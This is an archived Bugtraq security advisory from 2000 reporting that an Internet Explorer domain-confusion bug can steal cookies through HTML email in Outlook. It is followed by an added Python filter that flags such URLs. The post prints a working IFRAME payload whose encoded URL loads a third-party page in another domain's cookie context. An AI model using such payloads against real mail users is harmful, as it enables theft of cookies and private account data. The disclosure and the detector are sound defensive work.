[14883] in bugtraq


IE Domain Confusion Vulnerability is an Email problem also

daemon@ATHENA.MIT.EDU (Richard M. Smith)
Fri May 12 12:46:34 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <NDBBKGHPMKBKDDGLDEEHAEHMDIAA.rms2000@bellatlantic.net>
Date:         Fri, 12 May 2000 08:33:48 -0400
Reply-To: "Richard M. Smith" <rms2000@BELLATLANTIC.NET>
From: "Richard M. Smith" <rms2000@BELLATLANTIC.NET>
X-To:         aleph1@SECURITYFOCUS.COM, BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20000511135609.D7774@securityfocus.com>

Hi,

This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express.  The trick is
to put the magic URL in an HTML IFRAME tag.  Example:

<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>

A malicious Email message could include many IFRAMEs
to grab cookies from different domains.  The cookies
are stolen when the message is read.

Using an Email message, an attack can be directed
at a particular person or a group of people without
them ever going to a Web site.  The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.

I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.

This is a pretty bad bug.  People's private data at
Web sites is at risk here.

Richard

==========================================
Richard M. Smith
Internet consultant
Email: rms2000@bellatlantic.net
http://www.tiac.net/users/smiths
==========================================
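
Added example (not part of the original message): a mail-filter style check that flags URLs shaped like the one in the IFRAME above, where a percent-encoded delimiter appears before the first literal "/" of the URL. The attribute list and the names check_url, UrlCollector and scan_html are assumptions made for this sketch.

```python
import re
from html.parser import HTMLParser

# Percent-encoded URL delimiters ("/", "?", "#", "\") that have no place in a hostname.
ENCODED_DELIM = re.compile(r"%(?:2f|3f|23|5c)", re.IGNORECASE)
URL_ATTRS = {"src", "href", "background", "action"}  # assumed set of URL-bearing attributes

def check_url(url):
    """Return a finding if the part before the first literal "/" hides an encoded delimiter."""
    url = re.sub(r"\s+", "", url)          # undo mail line wrapping inside the attribute
    m = re.match(r"(?i)https?://([^/?#]*)", url)
    if m is None:
        return None
    authority = m.group(1)
    hits = list(ENCODED_DELIM.finditer(authority))
    if not hits:
        return None
    return {
        "url": url,
        "host_prefix": authority[:hits[0].start()],     # text before the first encoded delimiter
        "trailing_domain": authority[hits[-1].end():],  # text after the last encoded delimiter
    }

class UrlCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Check every URL-bearing attribute of every start tag.
        for name, value in attrs:
            if name in URL_ATTRS and value and (f := check_url(value)):
                self.findings.append({"tag": tag, **f})

def scan_html(body):
    """Parse an HTML mail body and return one finding per suspicious URL."""
    parser = UrlCollector()
    parser.feed(body)
    parser.close()
    return parser.findings

# Constructed sample: the message's IFRAME plus a link with an encoded slash only in its path.
SAMPLE = '''<p>hello</p>
<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>
<a href="http://www.example.com/docs%2fintro?x=1">docs</a>'''

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

The link to www.example.com is not flagged because its encoded slash comes after the first literal "/", so only the IFRAME is reported.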
